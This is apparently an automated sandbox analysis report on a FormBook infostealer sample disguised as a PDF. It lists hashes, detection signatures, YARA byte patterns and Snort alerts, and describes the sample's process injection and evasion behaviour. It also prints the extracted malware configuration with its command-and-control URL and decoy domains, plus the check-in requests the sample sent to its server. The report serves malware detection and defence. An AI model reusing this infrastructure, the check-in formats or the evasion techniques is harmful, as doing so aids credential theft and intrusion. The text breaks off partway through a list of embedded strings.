Analysis Report MV Sky Marine_pdf.exe

Overview

General Information

Sample Name: MV Sky Marine_pdf.exe
Analysis ID: 372691
MD5: 9558601f64f4d03a49bf20b3c0186af0
SHA1: adaf4ce8f18f8085ead9a4d92a5806ac3c54921d
SHA256: 00e599fadd6b7cd568751d9741ad77f85a7c9fdea785deed6898f348efd794fd
Tags: exe, Formbook
Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • MV Sky Marine_pdf.exe (PID: 5580 cmdline: 'C:\Users\user\Desktop\MV Sky Marine_pdf.exe' MD5: 9558601F64F4D03A49BF20B3C0186AF0)
    • MV Sky Marine_pdf.exe (PID: 5476 cmdline: 'C:\Users\user\Desktop\MV Sky Marine_pdf.exe' MD5: 9558601F64F4D03A49BF20B3C0186AF0)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 4500 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 3552 cmdline: /c del 'C:\Users\user\Desktop\MV Sky Marine_pdf.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.capacitaciondelfuturo.com/m2be/"], "decoy": ["sevenstepstohappy.co.uk", "best10hostings.com", "ponsatv.com", "estiqama.net", "miraculous.life", "sdsigmas.com", "lift-stock.xyz", "encoresmokeshop.com", "bahrsdie.info", "sacoriverdisc.com", "signi-notifcation.com", "fabulousfalafel.com", "gaitameonline.net", "dtzuixianya.com", "ebsesbaso.com", "maggionaossurvey.com", "thinkcleanedu.com", "jickstarter.com", "rakkuteno.icu", "nutri-vision.com", "soluzioniambientali.green", "somht.com", "smguidetowkw.com", "ondecktalentllc.com", "xcash.fund", "casinoflames.com", "cvacity.info", "reviewstechindia.com", "mantequillahub.pro", "fenixforex.com", "cxwanyuan.com", "thankyoumatcha.net", "aeo2.net", "pilarmarques.com", "yyxingfa.com", "antiracismbyu.com", "joncxvplw.com", "michaelroberts.gallery", "bachsimplicity.com", "pankotakediri.com", "lifemodern.online", "jayliving.com", "farmlifeonline.com", "watchtofree.com", "kantamiyatake.com", "kda2.com", "cvhrcm.com", "felinewish.com", "qwt.xyz", "verratjewelry.com", "studiocubodesign.net", "itallmall.com", "aingline.com", "qbuwobgii.icu", "owenvilla.com", "hipnoseportugal.com", "bestonline-businesses.com", "janetdeemasks.com", "indiaamazonica.com", "axa-imf.com", "paceclub.net", "magetu.info", "comercializadorajufe.com", "rahasiasuksesbo.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.275644751.00000000009E0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000002.275644751.00000000009E0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
3.1.MV Sky Marine_pdf.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.1.MV Sky Marine_pdf.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.1.MV Sky Marine_pdf.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x158a9:$sqlite3step: 68 34 1C 7B E1
  • 0x159bc:$sqlite3step: 68 34 1C 7B E1
  • 0x158d8:$sqlite3text: 68 38 2A 90 C5
  • 0x159fd:$sqlite3text: 68 38 2A 90 C5
  • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
3.1.MV Sky Marine_pdf.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.1.MV Sky Marine_pdf.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Found malware configuration
Source: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.capacitaciondelfuturo.com/m2be/"], "decoy": ["sevenstepstohappy.co.uk", "best10hostings.com", "ponsatv.com", "estiqama.net", "miraculous.life", "sdsigmas.com", "lift-stock.xyz", "encoresmokeshop.com", "bahrsdie.info", "sacoriverdisc.com", "signi-notifcation.com", "fabulousfalafel.com", "gaitameonline.net", "dtzuixianya.com", "ebsesbaso.com", "maggionaossurvey.com", "thinkcleanedu.com", "jickstarter.com", "rakkuteno.icu", "nutri-vision.com", "soluzioniambientali.green", "somht.com", "smguidetowkw.com", "ondecktalentllc.com", "xcash.fund", "casinoflames.com", "cvacity.info", "reviewstechindia.com", "mantequillahub.pro", "fenixforex.com", "cxwanyuan.com", "thankyoumatcha.net", "aeo2.net", "pilarmarques.com", "yyxingfa.com", "antiracismbyu.com", "joncxvplw.com", "michaelroberts.gallery", "bachsimplicity.com", "pankotakediri.com", "lifemodern.online", "jayliving.com", "farmlifeonline.com", "watchtofree.com", "kantamiyatake.com", "kda2.com", "cvhrcm.com", "felinewish.com", "qwt.xyz", "verratjewelry.com", "studiocubodesign.net", "itallmall.com", "aingline.com", "qbuwobgii.icu", "owenvilla.com", "hipnoseportugal.com", "bestonline-businesses.com", "janetdeemasks.com", "indiaamazonica.com", "axa-imf.com", "paceclub.net", "magetu.info", "comercializadorajufe.com", "rahasiasuksesbo.com"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nssBDFE.tmp\lckp0.dll ReversingLabs: Detection: 17%
Multi AV Scanner detection for submitted file
Source: MV Sky Marine_pdf.exe Virustotal: Detection: 33%
Source: MV Sky Marine_pdf.exe ReversingLabs: Detection: 23%
Yara detected FormBook
Source: Yara match File source: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.275644751.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.275618923.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.496617029.0000000000F50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.496712195.0000000000F80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.235033668.0000000002670000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 3.1.MV Sky Marine_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.MV Sky Marine_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MV Sky Marine_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.MV Sky Marine_pdf.exe.2670000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.MV Sky Marine_pdf.exe.2670000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MV Sky Marine_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nssBDFE.tmp\lckp0.dll Joe Sandbox ML: detected
Machine Learning detection for sample
Source: MV Sky Marine_pdf.exe Joe Sandbox ML: detected
Source: 3.1.MV Sky Marine_pdf.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.MV Sky Marine_pdf.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.MV Sky Marine_pdf.exe.2670000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.2.wlanext.exe.3867960.5.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.2.wlanext.exe.c5de40.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: MV Sky Marine_pdf.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wntdll.pdbUGP source: MV Sky Marine_pdf.exe, 00000002.00000003.231397905.0000000002D30000.00000004.00000001.sdmp, MV Sky Marine_pdf.exe, 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, wlanext.exe, 00000008.00000002.498016656.000000000344F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: MV Sky Marine_pdf.exe, wlanext.exe
Source: Binary string: wlanext.pdb source: MV Sky Marine_pdf.exe, 00000003.00000002.275693776.0000000000A40000.00000040.00000001.sdmp
Source: Binary string: wlanext.pdbGCTL source: MV Sky Marine_pdf.exe, 00000003.00000002.275693776.0000000000A40000.00000040.00000001.sdmp
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe Code function: 2_2_00405649 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 2_2_00405649
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe Code function: 2_2_0040601F FindFirstFileA,FindClose, 2_2_0040601F
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe Code function: 2_2_00402671 FindFirstFileA, 2_2_00402671
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe Code function: 4x nop then pop ebx 3_2_00406A94
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe Code function: 4x nop then pop ebx 3_1_00406A94
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 4x nop then pop ebx 8_2_00A96A95

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49721 -> 172.106.71.28:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49721 -> 172.106.71.28:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49721 -> 172.106.71.28:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49730 -> 103.48.133.159:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49730 -> 103.48.133.159:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49730 -> 103.48.133.159:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49734 -> 192.0.78.25:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49734 -> 192.0.78.25:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49734 -> 192.0.78.25:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.capacitaciondelfuturo.com/m2be/
Source: global traffic HTTP traffic detected: GET /m2be/?t8r=Pmzzl7xNdTjxpE7TKPUfs2K+Zd8HAaj1ahYlw/e4QxTLjn1ka96YHmJ+nuPWA19CGBx9&1bYxT=mTfpcdW HTTP/1.1 Host: www.maggionaossurvey.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /m2be/?t8r=0l3HkT4rKGRjwuaD6GRslzPylepCZX23oOXMbfcPML9ScCqaYm65vOxGdM+olqk7o7hp&1bYxT=mTfpcdW HTTP/1.1 Host: www.fenixforex.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /m2be/?t8r=ifCDsBLKzPO1/caYwbP7ucLsNIzdB7eAVK9yl0hh16u0W5iMVAB6bdOGECjvY1n5rRJ4&1bYxT=mTfpcdW HTTP/1.1 Host: www.somht.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /m2be/?t8r=JuGytuw0I2CvsJrhKPqxcSs+eAHRIhMzmg6m2gZ2Sf/5EFBq1ZxzSrCArrcyEBWmu86q&1bYxT=mTfpcdW HTTP/1.1 Host: www.capacitaciondelfuturo.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /m2be/?t8r=ym0xxX00S0Wf+ixf12QOfxKttvR95wzAnITo9bxnjEKQPe2KXbpsv5dlZ+lGmtzP6AJs&1bYxT=mTfpcdW HTTP/1.1 Host: www.mantequillahub.pro Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /m2be/?t8r=f9OOlDzSNjMkS+voKVj3JAm/FZou7FefMRO/dCbPYFE5jWEAY4Ie1mxxbA2c8ASh8bA/&1bYxT=mTfpcdW HTTP/1.1 Host: www.casinoflames.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /m2be/?t8r=NWfrKKCiNqgfEu2gJcL26nowwYOKbN5UMUQLTML9o4O8a7GsheA9LuahVJ9lTMe/g8Lv&1bYxT=mTfpcdW HTTP/1.1 Host: www.yyxingfa.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /m2be/?t8r=3hs/fdpsiUpFetMliLQ5KTd9k1PXkNk579eBvZhq6Qtrn5Lx9iP8uWKZaCpCbSQvRdph&1bYxT=mTfpcdW HTTP/1.1 Host: www.michaelroberts.gallery Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /m2be/?t8r=Nsc7yOpCpBP+OvQ//1jYzNnBC3WFsexPKF5AJOP3i6aMz/2MKahDz4LAsxw3nwyoR3zf&1bYxT=mTfpcdW HTTP/1.1 Host: www.antiracismbyu.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View IP Address: 192.0.78.25
Source: Joe Sandbox View ASN Name: DIGITALOCEAN-ASNUS
Source: Joe Sandbox View ASN Name: AUTOMATTICUS
Source: Joe Sandbox View ASN Name: WORLDSTREAMNL
Source: unknown DNS traffic detected: queries for: www.best10hostings.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 22 Mar 2021 07:56:14 GMT Content-Type: text/html Content-Length: 7354 Connection: close Last-Modified: Sat, 13 Feb 2021 16:45:30 GMT Accept-Ranges: bytes
Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: MV Sky Marine_pdf.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: MV Sky Marine_pdf.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.js
Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: https://fornex.com/
Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: https://fornex.com/antiddos/
Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: https://fornex.com/backup/
Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: https://fornex.com/dedicated/
Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: https://fornex.com/help/cpanel-first-steps/
Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: https://fornex.com/help/faq/
Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: https://fornex.com/help/transfer-site/
Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: https://fornex.com/my/tickets/
Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: https://fornex.com/ssd-hosting/
Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: https://fornex.com/ssd-vps/
Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: https://fornex.com/vpn/
Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: https://hostnl03.fornex.host/404/css/base.css
Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-114x114.png
Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-120x120.png
Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-144x144.png
Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-152x152.png
Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-57x57.png
Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-60x60.png
Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-72x72.png
Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-76x76.png
Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/favicon-128.png
Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/favicon-16x16.png
Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/favicon-196x196.png
Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/favicon-32x32.png
Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/favicon-96x96.png
Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/mstile-144x144.png
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/mstile-150x150.png
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/mstile-310x150.png
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/mstile-310x310.png
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/mstile-70x70.png
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/icons/search.png
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/logo
